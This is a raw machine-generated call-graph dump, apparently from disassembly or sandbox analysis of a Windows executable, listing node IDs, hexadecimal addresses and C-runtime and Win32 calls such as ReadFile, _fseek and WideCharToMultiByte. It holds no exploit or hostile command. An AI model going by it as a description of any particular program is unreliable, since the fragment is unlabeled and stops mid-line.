86894->86895 86896 426c2b 86894->86896 86899 40c321 86895->86899 86900 426c5a 86895->86900 86902 426c4b 86896->86902 86903 426c2e 86896->86903 87597 403ea0 52 API calls __cinit 86897->87597 87602 4534e3 52 API calls 86898->87602 87598 403ea0 52 API calls __cinit 86899->87598 87601 4534e3 52 API calls 86900->87601 87600 4534e3 52 API calls 86902->87600 86906 40c2de 86903->86906 87599 4534e3 52 API calls 86903->87599 86906->86691 86911 401a30 86910->86911 86912 401a17 86910->86912 86914 402160 52 API calls 86911->86914 86913 401a2d 86912->86913 87603 403c30 52 API calls _memmove 86912->87603 86913->86695 86915 401a3d 86914->86915 86915->86695 86918 411523 86917->86918 86919 4114ba 86917->86919 87606 4113a8 58 API calls 3 library calls 86918->87606 86922 40200c 86919->86922 87604 417f77 46 API calls __getptd_noexit 86919->87604 86922->86698 86922->86699 86923 4114c6 87605 417f25 10 API calls _xtow_s@20 86923->87605 86925->86727 86926->86729 86927->86734 86928->86734 86930 4026f0 52 API calls 86929->86930 86931 401c97 86930->86931 86931->86858 86932->86865 86933->86868 86994 40f6f0 86934->86994 86936 40f77b _strcat ctype 87002 40f850 86936->87002 86941 427c2a 87031 414d04 86941->87031 86943 40f7fc 86943->86941 86945 40f804 86943->86945 87018 414a46 86945->87018 86949 40f80e 86949->86872 86953 4528bd 86949->86953 86950 427c59 87037 414fe2 86950->87037 86952 427c79 86954 4150d1 _fseek 81 API calls 86953->86954 86955 452930 86954->86955 87537 452719 86955->87537 86958 452948 86958->86874 86959 414d04 __fread_nolock 61 API calls 86960 452966 86959->86960 86961 414d04 __fread_nolock 61 API calls 86960->86961 86962 452976 86961->86962 86963 414d04 __fread_nolock 61 API calls 86962->86963 86964 45298f 86963->86964 86965 414d04 __fread_nolock 61 API calls 86964->86965 86966 4529aa 86965->86966 86967 4150d1 _fseek 81 API calls 86966->86967 86968 4529c4 86967->86968 86969 4135bb _malloc 46 API calls 86968->86969 86970 4529cf 86969->86970 86971 4135bb _malloc 46 API calls 86970->86971 86972 4529db 86971->86972 86973 414d04 __fread_nolock 61 API calls 86972->86973 86974 4529ec 86973->86974 86975 44afef GetSystemTimeAsFileTime 86974->86975 86976 452a00 86975->86976 86977 452a36 86976->86977 86978 452a13 86976->86978 86980 452aa5 86977->86980 86981 452a3c 86977->86981 86979 413748 _free 46 API calls 86978->86979 86984 452a1c 86979->86984 86983 413748 _free 46 API calls 86980->86983 87543 44b1a9 86981->87543 86986 452aa3 86983->86986 86987 413748 _free 46 API calls 86984->86987 86985 452a9d 86988 413748 _free 46 API calls 86985->86988 86986->86874 86989 452a25 86987->86989 86988->86986 86989->86874 86991 431e64 86990->86991 86992 431e6a 86990->86992 86993 414a46 __fcloseall 82 API calls 86991->86993 86992->86875 86993->86992 86995 425de2 86994->86995 86996 40f6fc _wcslen 86994->86996 86995->86936 86997 40f710 WideCharToMultiByte 86996->86997 86998 40f756 86997->86998 86999 40f728 86997->86999 86998->86936 87000 4115d7 52 API calls 86999->87000 87001 40f735 WideCharToMultiByte 87000->87001 87001->86936 87004 40f85d __crtGetStringTypeA_stat _strlen 87002->87004 87005 40f7ab 87004->87005 87050 414db8 87004->87050 87006 4149c2 87005->87006 87065 414904 87006->87065 87008 40f7e9 87008->86941 87009 40f5c0 87008->87009 87013 40f5cd _strcat __write_nolock _memmove 87009->87013 87010 414d04 __fread_nolock 61 API calls 87010->87013 87011 40f691 __tzset_nolock 87011->86943 87013->87010 87013->87011 87014 425d11 87013->87014 87153 4150d1 87013->87153 87015 4150d1 _fseek 81 API calls 87014->87015 87016 425d33 87015->87016 87017 414d04 __fread_nolock 61 API calls 87016->87017 87017->87011 87019 414a52 _doexit 87018->87019 87020 414a64 87019->87020 87021 414a79 87019->87021 87293 417f77 46 API calls __getptd_noexit 87020->87293 87023 415471 __lock_file 47 API calls 87021->87023 87027 414a74 _doexit 87021->87027 87025 414a92 87023->87025 87024 414a69 87294 417f25 10 API calls _xtow_s@20 87024->87294 87277 4149d9 87025->87277 87027->86949 87362 414c76 87031->87362 87033 414d1c 87034 44afef 87033->87034 87530 442c5a 87034->87530 87036 44b00d 87036->86950 87038 414fee _doexit 87037->87038 87039 414ffa 87038->87039 87040 41500f 87038->87040 87534 417f77 46 API calls __getptd_noexit 87039->87534 87042 415471 __lock_file 47 API calls 87040->87042 87044 415017 87042->87044 87043 414fff 87535 417f25 10 API calls _xtow_s@20 87043->87535 87046 414e4e __ftell_nolock 51 API calls 87044->87046 87048 415024 87046->87048 87047 41500a _doexit 87047->86952 87536 41503d LeaveCriticalSection LeaveCriticalSection _fprintf 87048->87536 87051 414dd6 87050->87051 87052 414deb 87050->87052 87061 417f77 46 API calls __getptd_noexit 87051->87061 87052->87051 87054 414df2 87052->87054 87063 41b91b 79 API calls 12 library calls 87054->87063 87055 414ddb 87062 417f25 10 API calls _xtow_s@20 87055->87062 87058 414e18 87059 414de6 87058->87059 87064 418f98 77 API calls 7 library calls 87058->87064 87059->87004 87061->87055 87062->87059 87063->87058 87064->87059 87068 414910 _doexit 87065->87068 87066 414923 87121 417f77 46 API calls __getptd_noexit 87066->87121 87068->87066 87070 414951 87068->87070 87069 414928 87122 417f25 10 API calls _xtow_s@20 87069->87122 87084 41d4d1 87070->87084 87073 414956 87074 41496a 87073->87074 87075 41495d 87073->87075 87077 414992 87074->87077 87078 414972 87074->87078 87123 417f77 46 API calls __getptd_noexit 87075->87123 87101 41d218 87077->87101 87124 417f77 46 API calls __getptd_noexit 87078->87124 87079 414933 _doexit @_EH4_CallFilterFunc@8 87079->87008 87085 41d4dd _doexit 87084->87085 87086 4182cb __lock 46 API calls 87085->87086 87099 41d4eb 87086->87099 87087 41d560 87126 41d5fb 87087->87126 87088 41d567 87089 416b04 __malloc_crt 46 API calls 87088->87089 87092 41d56e 87089->87092 87091 41d5f0 _doexit 87091->87073 87092->87087 87093 41d57c InitializeCriticalSectionAndSpinCount 87092->87093 87094 41d59c 87093->87094 87095 41d5af EnterCriticalSection 87093->87095 87098 413748 _free 46 API calls 87094->87098 87095->87087 87096 418209 __mtinitlocknum 46 API calls 87096->87099 87098->87087 87099->87087 87099->87088 87099->87096 87129 4154b2 47 API calls __lock 87099->87129 87130 415520 LeaveCriticalSection LeaveCriticalSection _doexit 87099->87130 87102 41d23a 87101->87102 87103 41d255 87102->87103 87115 41d26c __wopenfile 87102->87115 87135 417f77 46 API calls __getptd_noexit 87103->87135 87105 41d25a 87136 417f25 10 API calls _xtow_s@20 87105->87136 87106 41d421 87107 41d47a 87106->87107 87108 41d48c 87106->87108 87140 417f77 46 API calls __getptd_noexit 87107->87140 87132 422bf9 87108->87132 87112 41d47f 87141 417f25 10 API calls _xtow_s@20 87112->87141 87113 41499d 87125 4149b8 LeaveCriticalSection LeaveCriticalSection _fprintf 87113->87125 87115->87106 87115->87107 87137 41341f 58 API calls 2 library calls 87115->87137 87117 41d41a 87117->87106 87138 41341f 58 API calls 2 library calls 87117->87138 87119 41d439 87119->87106 87139 41341f 58 API calls 2 library calls 87119->87139 87121->87069 87122->87079 87123->87079 87124->87079 87125->87079 87131 4181f2 LeaveCriticalSection 87126->87131 87128 41d602 87128->87091 87129->87099 87130->87099 87131->87128 87142 422b35 87132->87142 87134 422c14 87134->87113 87135->87105 87136->87113 87137->87117 87138->87119 87139->87106 87140->87112 87141->87113 87143 422b41 _doexit 87142->87143 87144 422b54 87143->87144 87147 422b8a 87143->87147 87145 417f77 _xtow_s@20 46 API calls 87144->87145 87146 422b59 87145->87146 87148 417f25 _xtow_s@20 10 API calls 87146->87148 87149 422400 __tsopen_nolock 109 API calls 87147->87149 87152 422b63 _doexit 87148->87152 87150 422ba4 87149->87150 87151 422bcb __wsopen_helper LeaveCriticalSection 87150->87151 87151->87152 87152->87134 87156 4150dd _doexit 87153->87156 87154 4150e9 87184 417f77 46 API calls __getptd_noexit 87154->87184 87156->87154 87157 41510f 87156->87157 87166 415471 87157->87166 87158 4150ee 87185 417f25 10 API calls _xtow_s@20 87158->87185 87165 4150f9 _doexit 87165->87013 87167 415483 87166->87167 87168 4154a5 EnterCriticalSection 87166->87168 87167->87168 87169 41548b 87167->87169 87171 415117 87168->87171 87170 4182cb __lock 46 API calls 87169->87170 87170->87171 87172 415047 87171->87172 87173 415067 87172->87173 87174 415057 87172->87174 87179 415079 87173->87179 87187 414e4e 87173->87187 87242 417f77 46 API calls __getptd_noexit 87174->87242 87178 41505c 87186 415143 LeaveCriticalSection LeaveCriticalSection _fprintf 87178->87186 87204 41443c 87179->87204 87182 4150b9 87217 41e1f4 87182->87217 87184->87158 87185->87165 87186->87165 87188 414e61 87187->87188 87189 414e79 87187->87189 87243 417f77 46 API calls __getptd_noexit 87188->87243 87191 414139 __fclose_nolock 46 API calls 87189->87191 87193 414e80 87191->87193 87192 414e66 87244 417f25 10 API calls _xtow_s@20 87192->87244 87195 41e1f4 __write 51 API calls 87193->87195 87196 414e97 87195->87196 87197 414f09 87196->87197 87199 414ec9 87196->87199 87203 414e71 87196->87203 87245 417f77 46 API calls __getptd_noexit 87197->87245 87200 41e1f4 __write 51 API calls 87199->87200 87199->87203 87201 414f64 87200->87201 87202 41e1f4 __write 51 API calls 87201->87202 87201->87203 87202->87203 87203->87179 87205 414455 87204->87205 87209 414477 87204->87209 87206 414139 __fclose_nolock 46 API calls 87205->87206 87205->87209 87207 414470 87206->87207 87246 41b7b2 77 API calls 6 library calls 87207->87246 87210 414139 87209->87210 87211 414145 87210->87211 87212 41415a 87210->87212 87247 417f77 46 API calls __getptd_noexit 87211->87247 87212->87182 87214 41414a 87248 417f25 10 API calls _xtow_s@20 87214->87248 87216 414155 87216->87182 87218 41e200 _doexit 87217->87218 87219 41e223 87218->87219 87220 41e208 87218->87220 87221 41e22f 87219->87221 87226 41e269 87219->87226 87269 417f8a 46 API calls __getptd_noexit 87220->87269 87271 417f8a 46 API calls __getptd_noexit 87221->87271 87224 41e20d 87270 417f77 46 API calls __getptd_noexit 87224->87270 87225 41e234 87272 417f77 46 API calls __getptd_noexit 87225->87272 87249 41ae56 87226->87249 87230 41e23c 87273 417f25 10 API calls _xtow_s@20 87230->87273 87231 41e26f 87233 41e291 87231->87233 87234 41e27d 87231->87234 87274 417f77 46 API calls __getptd_noexit 87233->87274 87259 41e17f 87234->87259 87236 41e215 _doexit 87236->87178 87238 41e289 87276 41e2c0 LeaveCriticalSection __unlock_fhandle 87238->87276 87239 41e296 87275 417f8a 46 API calls __getptd_noexit 87239->87275 87242->87178 87243->87192 87244->87203 87245->87203 87246->87209 87247->87214 87248->87216 87250 41ae62 _doexit 87249->87250 87251 41aebc 87250->87251 87252 4182cb __lock 46 API calls 87250->87252 87253 41aec1 EnterCriticalSection 87251->87253 87254 41aede _doexit 87251->87254 87255 41ae8e 87252->87255 87253->87254 87254->87231 87256 41aeaa 87255->87256 87257 41ae97 InitializeCriticalSectionAndSpinCount 87255->87257 87258 41aeec ___lock_fhandle LeaveCriticalSection 87256->87258 87257->87256 87258->87251 87260 41aded __commit 46 API calls 87259->87260 87261 41e18e 87260->87261 87262 41e1a4 SetFilePointer 87261->87262 87263 41e194 87261->87263 87264 41e1bb GetLastError 87262->87264 87266 41e1c3 87262->87266 87265 417f77 _xtow_s@20 46 API calls 87263->87265 87264->87266 87267 41e199 87265->87267 87266->87267 87268 417f9d __dosmaperr 46 API calls 87266->87268 87267->87238 87268->87267 87269->87224 87270->87236 87271->87225 87272->87230 87273->87236 87274->87239 87275->87238 87276->87236 87278 4149ea 87277->87278 87279 4149fe 87277->87279 87323 417f77 46 API calls __getptd_noexit 87278->87323 87282 41443c __flush 77 API calls 87279->87282 87285 4149fa 87279->87285 87281 4149ef 87324 417f25 10 API calls _xtow_s@20 87281->87324 87284 414a0a 87282->87284 87296 41d8c2 87284->87296 87295 414ab2 LeaveCriticalSection LeaveCriticalSection _fprintf 87285->87295 87288 414139 __fclose_nolock 46 API calls 87289 414a18 87288->87289 87300 41d7fe 87289->87300 87291 414a1e 87291->87285 87292 413748 _free 46 API calls 87291->87292 87292->87285 87293->87024 87294->87027 87295->87027 87297 414a12 87296->87297 87298 41d8d2 87296->87298 87297->87288 87298->87297 87299 413748 _free 46 API calls 87298->87299 87299->87297 87301 41d80a _doexit 87300->87301 87302 41d812 87301->87302 87303 41d82d 87301->87303 87340 417f8a 46 API calls __getptd_noexit 87302->87340 87304 41d839 87303->87304 87309 41d873 87303->87309 87342 417f8a 46 API calls __getptd_noexit 87304->87342 87307 41d817 87341 417f77 46 API calls __getptd_noexit 87307->87341 87308 41d83e 87343 417f77 46 API calls __getptd_noexit 87308->87343 87312 41ae56 ___lock_fhandle 48 API calls 87309->87312 87315 41d879 87312->87315 87313 41d81f _doexit 87313->87291 87314 41d846 87344 417f25 10 API calls _xtow_s@20 87314->87344 87317 41d893 87315->87317 87318 41d887 87315->87318 87345 417f77 46 API calls __getptd_noexit 87317->87345 87325 41d762 87318->87325 87321 41d88d 87346 41d8ba LeaveCriticalSection __unlock_fhandle 87321->87346 87323->87281 87324->87285 87347 41aded 87325->87347 87327 41d7c8 87360 41ad67 47 API calls 2 library calls 87327->87360 87328 41d772 87328->87327 87330 41d7a6 87328->87330 87332 41aded __commit 46 API calls 87328->87332 87330->87327 87333 41aded __commit 46 API calls 87330->87333 87331 41d7d0 87334 41d7f2 87331->87334 87361 417f9d 46 API calls 3 library calls 87331->87361 87335 41d79d 87332->87335 87336 41d7b2 CloseHandle 87333->87336 87334->87321 87338 41aded __commit 46 API calls 87335->87338 87336->87327 87339 41d7be GetLastError 87336->87339 87338->87330 87339->87327 87340->87307 87341->87313 87342->87308 87343->87314 87344->87313 87345->87321 87346->87313 87348 41ae12 87347->87348 87349 41adfa 87347->87349 87351 417f8a __commit 46 API calls 87348->87351 87355 41ae51 87348->87355 87350 417f8a __commit 46 API calls 87349->87350 87352 41adff 87350->87352 87354 41ae23 87351->87354 87353 417f77 _xtow_s@20 46 API calls 87352->87353 87356 41ae07 87353->87356 87357 417f77 _xtow_s@20 46 API calls 87354->87357 87355->87328 87356->87328 87358 41ae2b 87357->87358 87359 417f25 _xtow_s@20 10 API calls 87358->87359 87359->87356 87360->87331 87361->87334 87363 414c82 _doexit 87362->87363 87364 414cc3 87363->87364 87365 414c96 __crtGetStringTypeA_stat 87363->87365 87366 414cbb _doexit 87363->87366 87367 415471 __lock_file 47 API calls 87364->87367 87389 417f77 46 API calls __getptd_noexit 87365->87389 87366->87033 87368 414ccb 87367->87368 87375 414aba 87368->87375 87371 414cb0 87390 417f25 10 API calls _xtow_s@20 87371->87390 87378 414ad8 __crtGetStringTypeA_stat 87375->87378 87382 414af2 87375->87382 87376 414ae2 87442 417f77 46 API calls __getptd_noexit 87376->87442 87378->87376 87378->87382 87386 414b2d 87378->87386 87379 414ae7 87443 417f25 10 API calls _xtow_s@20 87379->87443 87391 414cfa LeaveCriticalSection LeaveCriticalSection _fprintf 87382->87391 87383 414c38 __crtGetStringTypeA_stat 87445 417f77 46 API calls __getptd_noexit 87383->87445 87384 414139 __fclose_nolock 46 API calls 87384->87386 87386->87382 87386->87383 87386->87384 87392 41dfcc 87386->87392 87422 41d8f3 87386->87422 87444 41e0c2 46 API calls 3 library calls 87386->87444 87389->87371 87390->87366 87391->87366 87393 41dfd8 _doexit 87392->87393 87394 41dfe0 87393->87394 87395 41dffb 87393->87395 87515 417f8a 46 API calls __getptd_noexit 87394->87515 87397 41e007 87395->87397 87400 41e041 87395->87400 87517 417f8a 46 API calls __getptd_noexit 87397->87517 87398 41dfe5 87516 417f77 46 API calls __getptd_noexit 87398->87516 87403 41e063 87400->87403 87404 41e04e 87400->87404 87402 41e00c 87518 417f77 46 API calls __getptd_noexit 87402->87518 87407 41ae56 ___lock_fhandle 48 API calls 87403->87407 87520 417f8a 46 API calls __getptd_noexit 87404->87520 87410 41e069 87407->87410 87408 41e014 87519 417f25 10 API calls _xtow_s@20 87408->87519 87409 41e053 87521 417f77 46 API calls __getptd_noexit 87409->87521 87413 41e077 87410->87413 87414 41e08b 87410->87414 87412 41dfed _doexit 87412->87386 87446 41da15 87413->87446 87522 417f77 46 API calls __getptd_noexit 87414->87522 87418 41e090 87523 417f8a 46 API calls __getptd_noexit 87418->87523 87419 41e083 87524 41e0ba LeaveCriticalSection __unlock_fhandle 87419->87524 87423 41d900 87422->87423 87426 41d915 87422->87426 87528 417f77 46 API calls __getptd_noexit 87423->87528 87425 41d905 87529 417f25 10 API calls _xtow_s@20 87425->87529 87429 41d94a 87426->87429 87436 41d910 87426->87436 87525 420603 87426->87525 87430 414139 __fclose_nolock 46 API calls 87429->87430 87431 41d95e 87430->87431 87432 41dfcc __read 59 API calls 87431->87432 87433 41d965 87432->87433 87434 414139 __fclose_nolock 46 API calls 87433->87434 87433->87436 87435 41d988 87434->87435 87435->87436 87437 414139 __fclose_nolock 46 API calls 87435->87437 87436->87386 87438 41d994 87437->87438 87438->87436 87439 414139 __fclose_nolock 46 API calls 87438->87439 87440 41d9a1 87439->87440 87441 414139 __fclose_nolock 46 API calls 87440->87441 87441->87436 87442->87379 87443->87382 87444->87386 87445->87379 87447 41da31 87446->87447 87448 41da4c 87446->87448 87449 417f8a __commit 46 API calls 87447->87449 87450 41da5b 87448->87450 87453 41da7a 87448->87453 87452 41da36 87449->87452 87451 417f8a __commit 46 API calls 87450->87451 87454 41da60 87451->87454 87456 417f77 _xtow_s@20 46 API calls 87452->87456 87455 41da98 87453->87455 87466 41daac 87453->87466 87457 417f77 _xtow_s@20 46 API calls 87454->87457 87458 417f8a __commit 46 API calls 87455->87458 87467 41da3e 87456->87467 87460 41da67 87457->87460 87462 41da9d 87458->87462 87459 41db02 87461 417f8a __commit 46 API calls 87459->87461 87463 417f25 _xtow_s@20 10 API calls 87460->87463 87464 41db07 87461->87464 87465 417f77 _xtow_s@20 46 API calls 87462->87465 87463->87467 87468 417f77 _xtow_s@20 46 API calls 87464->87468 87469 41daa4 87465->87469 87466->87459 87466->87467 87470 41dae1 87466->87470 87471 41db1b 87466->87471 87467->87419 87468->87469 87472 417f25 _xtow_s@20 10 API calls 87469->87472 87470->87459 87478 41daec ReadFile 87470->87478 87473 416b04 __malloc_crt 46 API calls 87471->87473 87472->87467 87475 41db31 87473->87475 87481 41db59 87475->87481 87482 41db3b 87475->87482 87476 41dc17 87477 41df8f GetLastError 87476->87477 87485 41dc2b 87476->87485 87479 41de16 87477->87479 87480 41df9c 87477->87480 87478->87476 87478->87477 87489 417f9d __dosmaperr 46 API calls 87479->87489 87494 41dd9b 87479->87494 87483 417f77 _xtow_s@20 46 API calls 87480->87483 87486 420494 __lseeki64_nolock 48 API calls 87481->87486 87484 417f77 _xtow_s@20 46 API calls 87482->87484 87487 41dfa1 87483->87487 87488 41db40 87484->87488 87485->87494 87495 41dc47 87485->87495 87498 41de5b 87485->87498 87490 41db67 87486->87490 87491 417f8a __commit 46 API calls 87487->87491 87492 417f8a __commit 46 API calls 87488->87492 87489->87494 87490->87478 87491->87494 87492->87467 87493 413748 _free 46 API calls 87493->87467 87494->87467 87494->87493 87496 41dcab ReadFile 87495->87496 87503 41dd28 87495->87503 87499 41dcc9 GetLastError 87496->87499 87508 41dcd3 87496->87508 87497 41ded0 ReadFile 87500 41deef GetLastError 87497->87500 87506 41def9 87497->87506 87498->87494 87498->87497 87499->87495 87499->87508 87500->87498 87500->87506 87501 41ddec MultiByteToWideChar 87501->87494 87502 41de10 GetLastError 87501->87502 87502->87479 87503->87494 87504 41dda3 87503->87504 87505 41dd96 87503->87505 87511 41dd60 87503->87511 87504->87511 87512 41ddda 87504->87512 87507 417f77 _xtow_s@20 46 API calls 87505->87507 87506->87498 87510 420494 __lseeki64_nolock 48 API calls 87506->87510 87507->87494 87508->87495 87509 420494 __lseeki64_nolock 48 API calls 87508->87509 87509->87508 87510->87506 87511->87501 87513 420494 __lseeki64_nolock 48 API calls 87512->87513 87514 41dde9 87513->87514 87514->87501 87515->87398 87516->87412 87517->87402 87518->87408 87519->87412 87520->87409 87521->87408 87522->87418 87523->87419 87524->87412 87526 416b04 __malloc_crt 46 API calls 87525->87526 87527 420618 87526->87527 87527->87429 87528->87425 87529->87436 87533 4148b3 GetSystemTimeAsFileTime __aulldiv 87530->87533 87532 442c6b 87532->87036 87533->87532 87534->87043 87535->87047 87536->87047 87540 45272f __tzset_nolock _wcscpy 87537->87540 87538 44afef GetSystemTimeAsFileTime 87538->87540 87539 4528a4 87539->86958 87539->86959 87540->87538 87540->87539 87541 414d04 61 API calls __fread_nolock 87540->87541 87542 4150d1 81 API calls _fseek 87540->87542 87541->87540 87542->87540 87544 44b1bc 87543->87544 87545 44b1ca 87543->87545 87546 4149c2 116 API calls 87544->87546 87547 44b1e1 87545->87547 87548 44b1d8 87545->87548 87549 4149c2 116 API calls 87545->87549 87546->87545 87578 4321a4 87547->87578 87548->86985 87550 44b2db 87549->87550 87550->87547 87552 44b2e9 87550->87552 87554 44b2f6 87552->87554 87557 414a46 __fcloseall 82 API calls 87552->87557 87553 44b224 87555 44b253 87553->87555 87556 44b228 87553->87556 87554->86985 87582 43213d 87555->87582 87559 44b235 87556->87559 87561 414a46 __fcloseall 82 API calls 87556->87561 87557->87554 87562 44b245 87559->87562 87563 414a46 __fcloseall 82 API calls 87559->87563 87560 44b25a 87564 44b260 87560->87564 87565 44b289 87560->87565 87561->87559 87562->86985 87563->87562 87567 44b26d 87564->87567 87569 414a46 __fcloseall 82 API calls 87564->87569 87592 44b0bf 87 API calls 87565->87592 87570 44b27d 87567->87570 87572 414a46 __fcloseall 82 API calls 87567->87572 87568 44b28f 87593 4320f8 46 API calls _free 87568->87593 87569->87567 87570->86985 87572->87570 87573 44b295 87574 44b2a2 87573->87574 87575 414a46 __fcloseall 82 API calls 87573->87575 87576 44b2b2 87574->87576 87577 414a46 __fcloseall 82 API calls 87574->87577 87575->87574 87576->86985 87577->87576 87579 4321cb 87578->87579 87581 4321b4 __tzset_nolock _memmove 87578->87581 87580 414d04 __fread_nolock 61 API calls 87579->87580 87580->87581 87581->87553 87583 4135bb _malloc 46 API calls 87582->87583 87584 432150 87583->87584 87585 4135bb _malloc 46 API calls 87584->87585 87586 432162 87585->87586 87587 4135bb _malloc 46 API calls 87586->87587 87588 432174 87587->87588 87590 432189 87588->87590 87594 4320f8 46 API calls _free 87588->87594 87590->87560 87591 432198 87591->87560 87592->87568 87593->87573 87594->87591 87595->86888 87596->86889 87597->86906 87598->86906 87599->86906 87600->86900 87601->86906 87602->86906 87603->86913 87604->86923 87605->86922 87606->86922 87656 410160 87607->87656 87609 41012f GetFullPathNameW 87610 410147 ctype 87609->87610 87610->86743 87612 4102cb SHGetDesktopFolder 87611->87612 87615 410333 _wcsncpy 87611->87615 87613 4102e0 _wcsncpy 87612->87613 87612->87615 87614 41031c SHGetPathFromIDListW 87613->87614 87613->87615 87614->87615 87615->86747 87617 425f4a 87616->87617 87618 4101bb 87616->87618 87621 4114ab __wcsicoll 58 API calls 87617->87621 87624 425f6e 87617->87624 87619 410160 52 API calls 87618->87619 87620 4101c7 87619->87620 87660 410200 52 API calls 2 library calls 87620->87660 87621->87617 87623 4101d6 87661 410200 52 API calls 2 library calls 87623->87661 87624->86749 87626 4101e9 87626->86749 87628 40f760 128 API calls 87627->87628 87629 40f584 87628->87629 87630 429335 87629->87630 87631 40f58c 87629->87631 87634 4528bd 118 API calls 87630->87634 87632 40f598 87631->87632 87633 429358 87631->87633 87686 4033c0 113 API calls 7 library calls 87632->87686 87687 434034 86 API calls _wprintf 87633->87687 87636 42934b 87634->87636 87639 429373 87636->87639 87640 42934f 87636->87640 87638 40f5b4 87638->86746 87642 4115d7 52 API calls 87639->87642 87643 431e58 82 API calls 87640->87643 87641 429369 87641->87639 87655 4293c5 ctype 87642->87655 87643->87633 87644 42959c 87645 413748 _free 46 API calls 87644->87645 87646 4295a5 87645->87646 87647 431e58 82 API calls 87646->87647 87648 4295b1 87647->87648 87652 401b10 52 API calls 87652->87655 87655->87644 87655->87652 87662 444af8 87655->87662 87665 44b41c 87655->87665 87672 402780 87655->87672 87680 4022d0 87655->87680 87688 44c7dd 64 API calls 3 library calls 87655->87688 87657 410167 _wcslen 87656->87657 87658 4115d7 52 API calls 87657->87658 87659 41017e _wcscpy 87658->87659 87659->87609 87660->87623 87661->87626 87663 4115d7 52 API calls 87662->87663 87664 444b27 _memmove 87663->87664 87664->87655 87666 44b429 87665->87666 87667 4115d7 52 API calls 87666->87667 87668 44b440 87667->87668 87669 44b45e 87668->87669 87670 401b10 52 API calls 87668->87670 87669->87655 87671 44b453 87670->87671 87671->87655 87673 402790 ctype _memmove 87672->87673 87674 402827 87672->87674 87675 4115d7 52 API calls 87673->87675 87676 4115d7 52 API calls 87674->87676 87677 402797 87675->87677 87676->87673 87678 4115d7 52 API calls 87677->87678 87679 4027bd 87677->87679 87678->87679 87679->87655 87681 4022e0 87680->87681 87683 40239d 87680->87683 87682 4115d7 52 API calls 87681->87682 87681->87683 87684 402320 ctype 87681->87684 87682->87684 87683->87655 87684->87683 87685 4115d7 52 API calls 87684->87685 87685->87684 87686->87638 87687->87641 87688->87655 87690 402539 ctype 87689->87690 87691 402417 87689->87691 87690->86753 87691->87690 87692 4115d7 52 API calls 87691->87692 87693 402443 87692->87693 87694 4115d7 52 API calls 87693->87694 87695 4024b4 87694->87695 87695->87690 87697 4022d0 52 API calls 87695->87697 87718 402880 95 API calls 2 library calls 87695->87718 87697->87695 87702 401566 87698->87702 87699 401794 87719 40e9a0 90 API calls 87699->87719 87702->87699 87703 4010a0 52 API calls 87702->87703 87704 40167a 87702->87704 87703->87702 87705 4017c0 87704->87705 87720 45e737 90 API calls 3 library calls 87704->87720 87705->86755 87707 40bc70 52 API calls 87706->87707 87716 40d451 87707->87716 87708 40d50f 87723 410600 52 API calls 87708->87723 87710 427c01 87724 45e737 90 API calls 3 library calls 87710->87724 87711 40e0a0 52 API calls 87711->87716 87713 401b10 52 API calls 87713->87716 87714 40d519 87714->86758 87716->87708 87716->87710 87716->87711 87716->87713 87716->87714 87721 40f310 53 API calls 87716->87721 87722 40d860 91 API calls 87716->87722 87718->87695 87719->87704 87720->87705 87721->87716 87722->87716 87723->87714 87724->87714 87725->86771 87726->86772 87728 4091c6 87727->87728 87729 42c5fe 87727->87729 87728->86831 87729->87728 87730 40bc70 52 API calls 87729->87730 87731 42c64e InterlockedIncrement 87730->87731 87732 42c665 87731->87732 87737 42c697 87731->87737 87735 42c672 InterlockedDecrement Sleep InterlockedIncrement 87732->87735 87732->87737 87733 42c737 InterlockedDecrement 87734 42c74a 87733->87734 87738 408f40 VariantClear 87734->87738 87735->87732 87735->87737 87736 42c731 87736->87733 87737->87733 87737->87736 88011 408e80 87737->88011 87740 42c752 87738->87740 88020 410c60 VariantClear ctype 87740->88020 87744 42c6db 87745 402160 52 API calls 87744->87745 87746 42c6e5 87745->87746 88016 45340c 85 API calls 87746->88016 87748 42c6f1 88017 40d200 52 API calls 2 library calls 87748->88017 87750 42c6fb 88018 465124 53 API calls 87750->88018 87752 42c715 87753 42c76a 87752->87753 87754 42c719 87752->87754 87756 401b10 52 API calls 87753->87756 88019 46fe32 VariantClear 87754->88019 87757 42c77e 87756->87757 87758 401980 53 API calls 87757->87758 87764 42c796 87758->87764 87759 42c812 88022 46fe32 VariantClear 87759->88022 87761 42c82a InterlockedDecrement 88023 46ff07 54 API calls 87761->88023 87763 42c864 88024 45e737 90 API calls 3 library calls 87763->88024 87764->87759 87764->87763 88021 40ba10 52 API calls 2 library calls 87764->88021 87766 42c9ec 88067 47d33e 331 API calls 87766->88067 87769 42c9fe 88068 46feb1 VariantClear VariantClear 87769->88068 87771 401980 53 API calls 87782 42c849 87771->87782 87772 408f40 VariantClear 87772->87782 87773 42ca08 87775 401b10 52 API calls 87773->87775 87774 42c874 87776 408f40 VariantClear 87774->87776 87784 42ca59 87774->87784 87778 42ca15 87775->87778 87777 42c891 87776->87777 88025 410c60 VariantClear ctype 87777->88025 87780 40c2c0 52 API calls 87778->87780 87780->87774 87781 402780 52 API calls 87781->87782 87782->87766 87782->87771 87782->87772 87782->87781 88026 40a780 87782->88026 87784->87784 87786 40afc4 87785->87786 87787 40b156 87785->87787 87788 40afd5 87786->87788 87789 42d1e3 87786->87789 88078 45e737 90 API calls 3 library calls 87787->88078 87793 40a780 194 API calls 87788->87793 87806 40b11a ctype 87788->87806 88079 45e737 90 API calls 3 library calls 87789->88079 87792 42d1f8 87798 408f40 VariantClear 87792->87798 87796 40b00a 87793->87796 87794 40b143 87794->86831 87796->87792 87799 40b012 87796->87799 87797 42d4db 87797->87797 87798->87794 87800 40b04a 87799->87800 87801 40b094 ctype 87799->87801 87803 42d231 VariantClear 87799->87803 87804 40b05c ctype 87800->87804 88080 40e270 VariantClear ctype 87800->88080 87802 40b108 87801->87802 87808 42d425 ctype 87801->87808 87802->87806 88081 40e270 VariantClear ctype 87802->88081 87803->87804 87804->87801 87809 4115d7 52 API calls 87804->87809 87805 42d45a VariantClear 87805->87806 87806->87794 88082 45e737 90 API calls 3 library calls 87806->88082 87808->87805 87808->87806 87809->87801 87812 408fff 87811->87812 87825 40900d 87811->87825 88083 403ea0 52 API calls __cinit 87812->88083 87815 42c3f6 88086 45e737 90 API calls 3 library calls 87815->88086 87817 40a780 194 API calls 87817->87825 87818 42c44a 88088 45e737 90 API calls 3 library calls 87818->88088 87820 42c47b 88089 451b42 61 API calls 87820->88089 87822 42c4cb 88091 47faae 233 API calls 87822->88091 87823 42c564 87828 408f40 VariantClear 87823->87828 87825->87815 87825->87817 87825->87818 87825->87820 87825->87822 87825->87823 87827 42c548 87825->87827 87831 409112 87825->87831 87832 4090f2 ctype 87825->87832 87833 42c528 87825->87833 87835 4090df 